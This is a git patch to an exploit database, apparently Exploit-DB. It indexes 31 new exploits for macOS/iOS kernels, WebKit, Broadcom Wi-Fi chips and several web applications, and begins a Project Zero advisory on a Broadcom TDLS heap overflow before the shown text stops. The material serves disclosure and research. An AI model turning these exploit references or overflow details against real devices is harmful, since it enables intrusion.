From 6624e39c26ef2d48421cba164e25ffa6ee0b90dc Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Wed, 5 Apr 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-04-05

31 new exploits

macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow
macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption
macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability
macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn
macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking
macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption
macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free
macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking
Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame
Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free
Apple WebKit - 'RenderLayer' Use-After-Free
Apple WebKit - Negative-Size memmove in HTMLFormElement
Apple WebKit - 'FormSubmission::create' Use-After-Free
Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free
Apple WebKit - 'table' Use-After-Free
Apple WebKit - 'WebCore::toJS' Use-After-Free
macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device
Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)
Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)
Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit
SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)
Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)
Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow
Pixie 1.0.4 - Arbitrary File Upload
Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window
Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting
Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion
Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting
Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting
Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting
Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting
Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting
Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting
Maian Uploader 4.0 - 'index.php' Cross-Site Scripting
Maian Uploader 4.0 - 'header.php' Cross-Site Scripting
Maian Uploader 4.0 - 'user' Parameter SQL Injection
Maian Survey 1.1 - 'survey' Parameter SQL Injection
Maian Greetings 2.1 - 'cat' Parameter SQL Injection
---
 files.csv | 39 ++++-
 platforms/hardware/dos/41806.txt | 75 +++++++++
 platforms/hardware/remote/41805.txt | 133 +++++++++++++++
 platforms/hardware/remote/41808.txt | 60 +++++++
 platforms/linux/local/41786.rb | 126 +++++++++++++++
 platforms/linux/remote/41785.rb | 197 +++++++++++++++++++++++
 platforms/linux/remote/41795.rb | 164 +++++++++++++++++++
 platforms/macos/dos/41790.c | 102 ++++++++++++
 platforms/macos/dos/41791.c | 70 ++++++++
 platforms/macos/dos/41797.c | 212 ++++++++++++++++++++++++
 platforms/macos/dos/41798.c | 138 ++++++++++++++++
 platforms/multiple/dos/41792.c | 113 +++++++++++++
 platforms/multiple/dos/41793.c | 185 +++++++++++++++++++++
 platforms/multiple/dos/41794.c | 146 +++++++++++++++++
 platforms/multiple/dos/41796.c | 166 +++++++++++++++++++
 platforms/multiple/dos/41807.html | 222 ++++++++++++++++++++++++++
 platforms/multiple/dos/41809.html | 175 ++++++++++++++++++++
 platforms/multiple/dos/41810.html | 137 ++++++++++++++++
 platforms/multiple/dos/41811.html | 195 ++++++++++++++++++++++
 platforms/multiple/dos/41812.html | 170 ++++++++++++++++++++
 platforms/multiple/dos/41813.html | 192 ++++++++++++++++++++++
 platforms/multiple/dos/41814.html | 195 ++++++++++++++++++++++
 platforms/multiple/local/41804.c | 220 +++++++++++++++++++++++++
 platforms/multiple/webapps/41799.html | 48 ++++++
 platforms/multiple/webapps/41800.html | 70 ++++++++
 platforms/multiple/webapps/41801.html | 51 ++++++
 platforms/multiple/webapps/41802.html | 86 ++++++++++
 platforms/multiple/webapps/41803.html | 34 ++++
 platforms/php/webapps/41784.txt | 108 +++++++++++++
 platforms/php/webapps/41787.txt | 26 +++
 platforms/php/webapps/41788.txt | 18 +++
 platforms/php/webapps/41789.txt | 18 +++
 32 files changed, 3887 insertions(+), 4 deletions(-)
 create mode 100755 platforms/hardware/dos/41806.txt
 create mode 100755 platforms/hardware/remote/41805.txt
 create mode 100755 platforms/hardware/remote/41808.txt
 create mode 100755 platforms/linux/local/41786.rb
 create mode 100755 platforms/linux/remote/41785.rb
 create mode 100755 platforms/linux/remote/41795.rb
 create mode 100755 platforms/macos/dos/41790.c
 create mode 100755 platforms/macos/dos/41791.c
 create mode 100755 platforms/macos/dos/41797.c
 create mode 100755 platforms/macos/dos/41798.c
 create mode 100755 platforms/multiple/dos/41792.c
 create mode 100755 platforms/multiple/dos/41793.c
 create mode 100755 platforms/multiple/dos/41794.c
 create mode 100755 platforms/multiple/dos/41796.c
 create mode 100755 platforms/multiple/dos/41807.html
 create mode 100755 platforms/multiple/dos/41809.html
 create mode 100755 platforms/multiple/dos/41810.html
 create mode 100755 platforms/multiple/dos/41811.html
 create mode 100755 platforms/multiple/dos/41812.html
 create mode 100755 platforms/multiple/dos/41813.html
 create mode 100755 platforms/multiple/dos/41814.html
 create mode 100755 platforms/multiple/local/41804.c
 create mode 100755 platforms/multiple/webapps/41799.html
 create mode 100755 platforms/multiple/webapps/41800.html
 create mode 100755 platforms/multiple/webapps/41801.html
 create mode 100755 platforms/multiple/webapps/41802.html
 create mode 100755 platforms/multiple/webapps/41803.html
 create mode 100755 platforms/php/webapps/41784.txt
 create mode 100755 platforms/php/webapps/41787.txt
 create mode 100755 platforms/php/webapps/41788.txt
 create mode 100755 platforms/php/webapps/41789.txt

diff --git a/files.csv b/files.csv
index 0143d75a5..a7b985b1a 100644
--- a/files.csv
+++ b/files.csv
@@ -203,6 +203,7 @@ id,file,description,date,author,platform,type,port
 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0
 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0
 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0
+41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0
 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0
 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0
@@ -1909,7 +1910,9 @@ id,file,description,date,author,platform,type,port
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0
+41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0
+41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080
 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0
 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0
@@ -5430,8 +5433,13 @@ id,file,description,date,author,platform,type,port
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
+41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
+41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
+41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
+41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
+41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@@ -5444,6 +5452,14 @@ id,file,description,date,author,platform,type,port
 41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0
 41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0
 41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0
+41806,platforms/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos,0
+41807,platforms/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41809,platforms/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41810,platforms/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",multiple,dos,0
+41811,platforms/multiple/dos/41811.html,"Apple WebKit - 'FormSubmission::create' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41812,platforms/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6789,6 +6805,7 @@ id,file,description,date,author,platform,type,port
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
+41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
@@ -6798,6 +6815,7 @@ id,file,description,date,author,platform,type,port
 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0
 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0
+41786,platforms/linux/local/41786.rb,"Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)",2017-04-03,"Chris Hebert",linux,local,0
 16606,platforms/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0
@@ -10625,6 +10643,7 @@ id,file,description,date,author,platform,type,port
 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
+41785,platforms/linux/remote/41785.rb,"Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)",2017-04-03,"Chris Hebert",linux,remote,0
 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
 16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0
@@ -14396,6 +14415,7 @@ id,file,description,date,author,platform,type,port
 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0
 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0
 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
+41805,platforms/hardware/remote/41805.txt,"Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit",2017-04-04,"Google Security Research",hardware,remote,0
 33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
 33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0
@@ -15393,14 +15413,16 @@ id,file,description,date,author,platform,type,port
 41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
+41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
-41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
+41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
 41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
+41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -24738,7 +24760,13 @@ id,file,description,date,author,platform,type,port
 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0
 16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0
+41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0
 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
+41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0
+41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
+41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0
+41799,platforms/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
+41800,platforms/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0
 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0
 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0
@@ -32157,9 +32185,9 @@ id,file,description,date,author,platform,type,port
 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0
 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0
 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
-31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
-31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
-31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
+31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
+31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
+31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
 31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0
 31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
 31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
@@ -37626,6 +37654,9 @@ id,file,description,date,author,platform,type,port
 41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0
 41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0
 41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0
+41787,platforms/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
+41788,platforms/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
+41789,platforms/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
 41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0
 41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0
 41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0
diff --git a/platforms/hardware/dos/41806.txt b/platforms/hardware/dos/41806.txt
new file mode 100755
index 000000000..cefd5930c
--- /dev/null
+++ b/platforms/hardware/dos/41806.txt
@@ -0,0 +1,75 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1047
+
+Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.
+
+One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP).
+
+In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK).
+
+When a TDLS Setup Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS Setup Request and TDLS Setup Confirm frames is calculated as follows:
+
+AES-CMAC(TPK-KCK, InitiatorMAC ||
+ ResponderMAC ||
+ TransactionSeq ||
+ LinkID-IE ||
+ RSN-IE ||
+ TimeoutInterval-IE ||
+ FastTransition-IE)
+
+(see "wpa_tdls_ftie_mic" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c)
+
+All TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer).
+
+When the BCM firmware receives a TDLS Setup request frame, it verifies the MIC and responds with a TDLS Setup Response frame. The initiator then sends a TDLS Setup confirm frame in order to establish the connection. The BCM firmware uses the "wlc_tdls_cal_mic_chk" function to calculate the MIC of the received frames (both for the setup and the confirm). When processing the TDLS Setup Request frame, the RSN IE is verified and parsed in order to proceed with the derivation of the TPK. This verification also makes sure that the length of the RSN IE is valid for the chosen encryption type. However, when a TDLS Setup Confirm (M3) message is received, the firmware fails to verify the RSN IE, before calling the "wlc_tdls_cal_mic_chk" function in order to verify the MIC of the incoming frame.
+
+The "wlc_tdls_cal_mic_chk" function allocates a buffer of size 256 on the heap, into which the needed information elements are gathered in order to calculate the AES-CMAC. However, the function does not sufficiently verify the length of the RSN IE included in the Setup Confirm frame. This allows an attacker to include an abnormally large RSN IE, causing a heap-overflow in "wlc_tdls_cal_mic_chk".
+
+Here is the approximate simplified high-level code for the function:
+
+1. uint8_t* buffer = malloc(256);
+2. uint8_t* pos = buffer;
+3.
+4. //Copying the initial (static) information
+5. uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
+6. memcpy(pos, linkid_ie + 0x8, 0x6); pos += 0x6; //Initiator MAC
+7. memcpy(pos, linkid_ie + 0xE, 0x6); pos += 0x6; //Responder MAC
+8. *pos = transaction_seq; pos++; //TransactionSeq
+9. memcpy(pos, linkid_ie, 0x14); pos += 0x14; //LinkID-IE
+10.
+11. //Copying the RSN IE
